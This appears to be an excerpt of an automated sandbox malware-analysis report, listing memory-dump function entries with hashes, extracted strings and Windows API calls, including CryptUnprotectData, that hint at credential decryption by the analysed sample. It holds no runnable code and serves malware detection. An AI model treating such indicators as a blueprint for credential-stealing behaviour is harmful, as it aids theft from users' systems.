                                  • Instruction ID: 17ef35f4e05f305694c81591b7b4995f39efa32764f15f294f3f65d2805dd4dd
                                  • Opcode Fuzzy Hash: a38475b7333f083f2e85c3bd28b191e9a81efc9ed5a4f0999c707a142891e06e
                                  • Instruction Fuzzy Hash: 5941E970A40A289FDB24DB54CC95FABB7B5FB48702F5081D8E618E7290D771AE85CF50
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 006BA2D4
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 006BA2F3
                                  • LocalFree.KERNEL32(?), ref: 006BA323
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 8378d067d0ef68ac0e6aa848b68ec9953484e469c373299d42c7602dae59ddec
                                  • Instruction ID: a0532546bd898d30d8dcad623b17cf23e6474c7d5c746ccf9e30d23486647c38
                                  • Opcode Fuzzy Hash: 8378d067d0ef68ac0e6aa848b68ec9953484e469c373299d42c7602dae59ddec
                                  • Instruction Fuzzy Hash: 4111E5B8A00209EFCB04DFA8D884AAEB7B5FB88300F108559ED15A7390D730AE50CB61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: #d7?$Y.JA
                                  • API String ID: 0-719740578
                                  • Opcode ID: a22aa1c2be853986f7f86311f3837e633fb9bcf58cea3b37c8fff9e1aefd8df0
                                  • Instruction ID: 8981ef7ea35f69ff388f5a44fd10dc129728d9a8bef65c3aaccd2255e8f1a6d3
                                  • Opcode Fuzzy Hash: a22aa1c2be853986f7f86311f3837e633fb9bcf58cea3b37c8fff9e1aefd8df0
                                  • Instruction Fuzzy Hash: ECB207F3A0C2009FE3046E2DEC8567AFBE9EF94720F1A493DE6C4C7744EA3558458696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: I9*$z&}
                                  • API String ID: 0-1179308910
                                  • Opcode ID: b569fdfd2db154e8c1072a7c73dd682a19a8b2bdee017d9b4d76ffbe1ebbd663
                                  • Instruction ID: 05d85b933fcf6c5137de17b40a4ff930a50f2d8831af603ca154bb683b816e63
                                  • Opcode Fuzzy Hash: b569fdfd2db154e8c1072a7c73dd682a19a8b2bdee017d9b4d76ffbe1ebbd663
                                  • Instruction Fuzzy Hash: 1DB206F360C2049FE704AE2DEC4567ABBE9EF94720F1A892DE6C4C3744EA3558418797
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ?$__ZN
                                  • API String ID: 0-1427190319
                                  • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                  • Instruction ID: b70d6066a6bc1b5f39172a81a2a1b7e49b3cb5118e1a0c3b05509c10c16650d3
                                  • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                  • Instruction Fuzzy Hash: 64724572A08B709BD714CF24D88066AB7E2FFC5310F598A1DF9959B291D378DC41DB82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: |\f
                                  • API String ID: 0-3295364727
                                  • Opcode ID: 001ae0a81d7bc1477871179130f4ee6e296647716887c5be5a5a828e0b892376
                                  • Instruction ID: b7acb6d853d01f3e1bfe3a2241e11aba32dfd03e880df8f35d203da3ff5b861e
                                  • Opcode Fuzzy Hash: 001ae0a81d7bc1477871179130f4ee6e296647716887c5be5a5a828e0b892376
                                  • Instruction Fuzzy Hash: B9B22AF3A0C6009FE3086E2DEC9567ABBD5EF94720F1A453DEAC5D3740EA3598018697
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: xn--
                                  • API String ID: 0-2826155999
                                  • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                  • Instruction ID: 9de7e829130585237c359cc857b4e7e1c8bfa8f5fe5967c93309ba3e7b1fdaf3
                                  • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                  • Instruction Fuzzy Hash: A2A210B1D00268CAEF18CB68C8A43EDB7F1AF55300F1883AAD5567B2C1D77D9A91CB51
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID:
                                  • API String ID: 3732870572-0
                                  • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                  • Instruction ID: 6e31e7eafb142b8d3b8a6ae85b4de2f4b89f76cfbb010b6a7e050e76d266d2c2
                                  • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                  • Instruction Fuzzy Hash: 4AE1DF71608345DFC724DF28C8807AFB7E2EF89300F594A2DE5D99B291D735A855CB82
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID:
                                  • API String ID: 3732870572-0
                                  • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                  • Instruction ID: a52b523b693546ff10630154791d364c7007607be7ee8f6217cd74c2a3fa57c7
                                  • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                  • Instruction Fuzzy Hash: EBE1C6B1A08301DFDB24DE18C8817AEB7E6EFC5310F558A2DE68997291E734EC45CB46
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                  • Instruction ID: ad070dbe9b7b7e55e9693b40ce83167868de9379fdaef654359d5a63c1395e5f
                                  • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                  • Instruction Fuzzy Hash: 67027974E006598FCF26CFA8C4905EDBBF6FF89310F548259E889AB355C734AA91CB50
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                  • Instruction ID: 34201a7a11c1af025d4d0f35e279fa316c5a5913a319c1022ee494ec25c37d49
                                  • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                  • Instruction Fuzzy Hash: 66020275E00619CFCF15CF98C8809ADB7B6FF88350F258669E809AB355D731AA91CF90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                  • Instruction ID: 55ea8e75e1a3f08063fcc4e826b49bb9fbf6fe971fe37b475640c25ab51fc2ed
                                  • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                  • Instruction Fuzzy Hash: 65C17E76E29B925BD713873DD802265F394AFF7290F05D72EFCE472A42FB2096818204
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                  • Instruction ID: cb885ccea7df5c2af56883495a6e2471275eec598c487765b40c9f484479eed5
                                  • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                  • Instruction Fuzzy Hash: 4AD14870600B40DFD721CF29C495BA7B7E0BB49300F14896ED89A8BB92D739F989CB51
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                                  • Instruction ID: 874f893fe67cffc2c274e13da0197c807ac36fba4a6f6ffd0bc168b2c17f973b
                                  • Opcode Fuzzy Hash: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                                  • Instruction Fuzzy Hash: 1FD12BB0108381CFD7248F55C1A472BBFE0AF95748F188A5EE4D90B3D1D7BA9948DB92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                  • Instruction ID: 7afba12778fe4f5c727e06cf5eb506f7c68eae3fa4f1083013efe34a32bfad72
                                  • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                  • Instruction Fuzzy Hash: C4B19372A083555BD308CF25C4913ABF7E2EFC8310F1AC93EE99997291DB74D9419A82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                  • Instruction ID: aa8af2486e025f4fa52bd134d7831c19e05f39e8909adbb7529d30baa9507208
                                  • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                  • Instruction Fuzzy Hash: 03B19072A093515BD308CF25C8913ABF7E3EFC8310F1AC93EA89997291D774D9459A82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                  • Instruction ID: 18d717b7cfbc345d79f1362a76f04e593aa526d70efb35a0ca079fc7b7ac6dc2
                                  • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                  • Instruction Fuzzy Hash: 57B14A71A093528FD706EE3EC491215F7D2AFE6280F50C72EE995B7762E731E8818740
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                  • Instruction ID: 5c16bb04d7e1274aaeccf065f0fe0fd181e39499cf55a522b4237b0054fb7830
                                  • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                  • Instruction Fuzzy Hash: 6391C471A00235ABDF24CE68EC80BBAB3A1BF55300F554564E914AB387E33ADD06C7A5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                  • Instruction ID: 34c41e10f1f4086853a44b12cf6e6140af2f34edc05de9ed5deaa0c598ccca83
                                  • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                  • Instruction Fuzzy Hash: 82B13B31610609DFE715CF28C48ABA57BE0FF85364F25865CE999CF2A2C379E991CB40
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                  • Instruction ID: 95ed91cbf0d33fe94748b62a40b8781d430e6fde815e69b726d2dba4061396a1
                                  • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                  • Instruction Fuzzy Hash: 79C14A75A0471A8FC715DF28C08045AB7F2FF88350F258A6DE8999B721D731E996CF81
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                  • Instruction ID: b975b0b3caf489289ff0f1b2444ae1b6d8068e7bb36bfbdcac0a8fe2146098d4
                                  • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                  • Instruction Fuzzy Hash: C2914931928791AAFB268B3CCC417AAB754FFE6350F14C31AF98872491FB7989C18745
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 92a1990abdf93b80eb2ee63e3536fff3069c42eef276a25ebbcf3ad503e743e1
                                  • Instruction ID: f0611560e241a24f0b127d87ad8f092451d7be01c96ac6ec213a3ba1a8698bf9
                                  • Opcode Fuzzy Hash: 92a1990abdf93b80eb2ee63e3536fff3069c42eef276a25ebbcf3ad503e743e1
                                  • Instruction Fuzzy Hash: 7F71AEF3A082105FF708AE2DEC8577A7BD6DBD8720F19853DE794C7788E93858018296
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                  • Instruction ID: 38606b659a4200a06e8339a608319f10fc4a6b8507529d3806781d06b7065ab0
                                  • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                  • Instruction Fuzzy Hash: C7A13072A00A29CBEB29CF55DCC5A9EBBB1FB54314F14C22AD41AE73A0D334A944CF50
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                  • Instruction ID: 016dbc8abf465ab5cc1392c8aa508f0010b5736fb49b0dd8fce59b4190e2feb4
                                  • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                  • Instruction Fuzzy Hash: 0FA16E72E083519BD308CF25C89075BF7E2EFC8710F1ACA3DA89997654DB74E9419B82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
